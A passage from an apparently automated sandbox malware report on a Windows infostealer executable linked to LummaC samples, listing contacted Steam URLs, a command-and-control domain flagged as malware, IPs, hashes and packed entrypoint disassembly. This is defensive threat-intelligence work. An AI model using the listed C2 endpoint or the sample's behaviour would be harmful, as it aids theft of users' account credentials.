                                                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://recaptcha.net/recaptcha/;3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://lev-tolstoi.com/apix3LUyRfIoKs.exe, 00000000.00000003.2294710528.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://login.steamp3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://steamcommunity.com/discussions/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://store.steampowered.com/pr3LUyRfIoKs.exe, 00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268860714.00000000013F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://store.steampowered.com/stats/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://medal.tv3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://broadcast.st.dl.eccdnx.com3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://steamcommunity.com/li3LUyRfIoKs.exe, 00000000.00000003.2269185340.0000000001396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://x1.c.lencr.org/03LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://x1.i.lencr.org/03LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319003LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620163LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high

                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          104.21.66.86
                                                                                                                                                                                                                          		lev-tolstoi.comUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          23.55.153.106
                                                                                                                                                                                                                          		steamcommunity.comUnited States
                                                                                                                                                                                                                          		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1581617
                                                                                                                                                                                                                          Start date and time:2024-12-28 09:55:26 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 5m 58s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:4
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:3LUyRfIoKs.exe
                                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                                          Original Sample Name:e17baab743930b14a8d9a54086f091d6.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          03:56:23API Interceptor17x Sleep call for process: 3LUyRfIoKs.exe modified

                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                          23.55.153.106726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          N36e6JFEp6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            k7T6akLcAr.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              lev-tolstoi.com726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              k7T6akLcAr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              SPzPNCzcCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              steamcommunity.com726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              N36e6JFEp6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              k7T6akLcAr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106

                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              AKAMAI-ASN1EU726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 23.44.201.12
                                                                                                                                                                                                                                              N36e6JFEp6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              CLOUDFLARENETUS726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                              FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                              j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.2.51
                                                                                                                                                                                                                                              k7T6akLcAr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 172.67.157.254

                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              N36e6JFEp6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                              j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                              • 23.55.153.106

                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                              No created / dropped files found

                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.952228277100867
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:3LUyRfIoKs.exe
                                                                                                                                                                                                                                              File size:1'836'544 bytes
                                                                                                                                                                                                                                              MD5:e17baab743930b14a8d9a54086f091d6
                                                                                                                                                                                                                                              SHA1:7eed52a4f370c7dc47ac8e4a7ea04a16fafd5993
                                                                                                                                                                                                                                              SHA256:315aee541b7f4d32b0fa71932e9227aa3ef1667856d5dc35c97bf1434e2ae31c
                                                                                                                                                                                                                                              SHA512:d6fc974855beacc7b3605ef0c99aac5879be9a208ce69b7af941d715343fbf7be2ab0df5c345c67a2a56f614d3279d1b48be66030e4bf73d454843d8634d2f68
                                                                                                                                                                                                                                              SSDEEP:49152:fAPsGokjs9oS7M9sG3Ve+a1Tn102BcjkDMXp:fSsGoBw9sUVOTn1/uQDM5
                                                                                                                                                                                                                                              TLSH:4885334DA7BF0647C64041B4636EACA8C3F05B27366963A6E25D3069C9CB3C5B8C4F6D
                                                                                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................H...........@...........................H.....V.....@.................................Y@..m..

                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Entrypoint:0x889000
                                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              jmp 00007F2830C5B8EAh
                                                                                                                                                                                                                                              pmulhuw mm3, qword ptr [ebx]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add cl, ch
                                                                                                                                                                                                                                              add byte ptr [eax], ah
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              inc ecx
                                                                                                                                                                                                                                              push bx
                                                                                                                                                                                                                                              dec esi
                                                                                                                                                                                                                                              dec ebp
                                                                                                                                                                                                                                              das
                                                                                                                                                                                                                                              xor al, 36h
                                                                                                                                                                                                                                              dec edi
                                                                                                                                                                                                                                              bound ecx, dword ptr [ecx+4Ah]
                                                                                                                                                                                                                                              dec edx
                                                                                                                                                                                                                                              insd
                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              jbe 00007F2830C5B952h
                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                              dec edx
                                                                                                                                                                                                                                              popad
                                                                                                                                                                                                                                              je 00007F2830C5B94Bh
                                                                                                                                                                                                                                              push edx
                                                                                                                                                                                                                                              dec esi
                                                                                                                                                                                                                                              jc 00007F2830C5B95Ah
                                                                                                                                                                                                                                              cmp byte ptr [ebx], dh
                                                                                                                                                                                                                                              push edx
                                                                                                                                                                                                                                              jns 00007F2830C5B927h
                                                                                                                                                                                                                                              or eax, 49674B0Ah
                                                                                                                                                                                                                                              cmp byte ptr [edi+43h], dl
                                                                                                                                                                                                                                              jnc 00007F2830C5B92Dh
                                                                                                                                                                                                                                              bound eax, dword ptr [ecx+30h]
                                                                                                                                                                                                                                              pop edx
                                                                                                                                                                                                                                              inc edi
                                                                                                                                                                                                                                              push esp
                                                                                                                                                                                                                                              push 43473163h
                                                                                                                                                                                                                                              aaa
                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                              dec esi
                                                                                                                                                                                                                                              xor ebp, dword ptr [ebx+59h]
                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                              push edx
                                                                                                                                                                                                                                              pop eax
                                                                                                                                                                                                                                              je 00007F2830C5B937h
                                                                                                                                                                                                                                              xor dl, byte ptr [ebx+2Bh]
                                                                                                                                                                                                                                              popad
                                                                                                                                                                                                                                              jne 00007F2830C5B92Ch
                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                              dec ebp
                                                                                                                                                                                                                                              jo 00007F2830C5B923h
                                                                                                                                                                                                                                              xor dword ptr [edi], esi
                                                                                                                                                                                                                                              inc esp
                                                                                                                                                                                                                                              dec edx
                                                                                                                                                                                                                                              dec ebp
                                                                                                                                                                                                                                              jns 00007F2830C5B930h
                                                                                                                                                                                                                                              insd
                                                                                                                                                                                                                                              jnc 00007F2830C5B950h
                                                                                                                                                                                                                                              aaa
                                                                                                                                                                                                                                              inc esp
                                                                                                                                                                                                                                              inc ecx
                                                                                                                                                                                                                                              inc ebx
                                                                                                                                                                                                                                              xor dl, byte ptr [ecx+4Bh]
                                                                                                                                                                                                                                              inc edx
                                                                                                                                                                                                                                              inc esp
                                                                                                                                                                                                                                              bound esi, dword ptr [ebx]
                                                                                                                                                                                                                                              or eax, 63656B0Ah
                                                                                                                                                                                                                                              jno 00007F2830C5B938h
                                                                                                                                                                                                                                              push edx
                                                                                                                                                                                                                                              insb
                                                                                                                                                                                                                                              js 00007F2830C5B951h
                                                                                                                                                                                                                                              outsb
                                                                                                                                                                                                                                              inc ecx
                                                                                                                                                                                                                                              jno 00007F2830C5B932h
                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                                              pop edx
                                                                                                                                                                                                                                              xor eax, dword ptr [ebx+36h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              aaa
                                                                                                                                                                                                                                              imul edx, dword ptr [ebx+58h], 4Eh
                                                                                                                                                                                                                                              aaa
                                                                                                                                                                                                                                              inc ebx
                                                                                                                                                                                                                                              jbe 00007F2830C5B92Ch
                                                                                                                                                                                                                                              dec ebx
                                                                                                                                                                                                                                              js 00007F2830C5B923h
                                                                                                                                                                                                                                              jne 00007F2830C5B911h
                                                                                                                                                                                                                                              push esp
                                                                                                                                                                                                                                              inc bp
                                                                                                                                                                                                                                              outsb
                                                                                                                                                                                                                                              inc edx
                                                                                                                                                                                                                                              popad
                                                                                                                                                                                                                                              dec ebx
                                                                                                                                                                                                                                              insd
                                                                                                                                                                                                                                              dec ebp
                                                                                                                                                                                                                                              inc edi
                                                                                                                                                                                                                                              xor dword ptr [ecx+36h], esp
                                                                                                                                                                                                                                              push 0000004Bh
                                                                                                                                                                                                                                              sub eax, dword ptr [ebp+33h]
                                                                                                                                                                                                                                              jp 00007F2830C5B93Ch
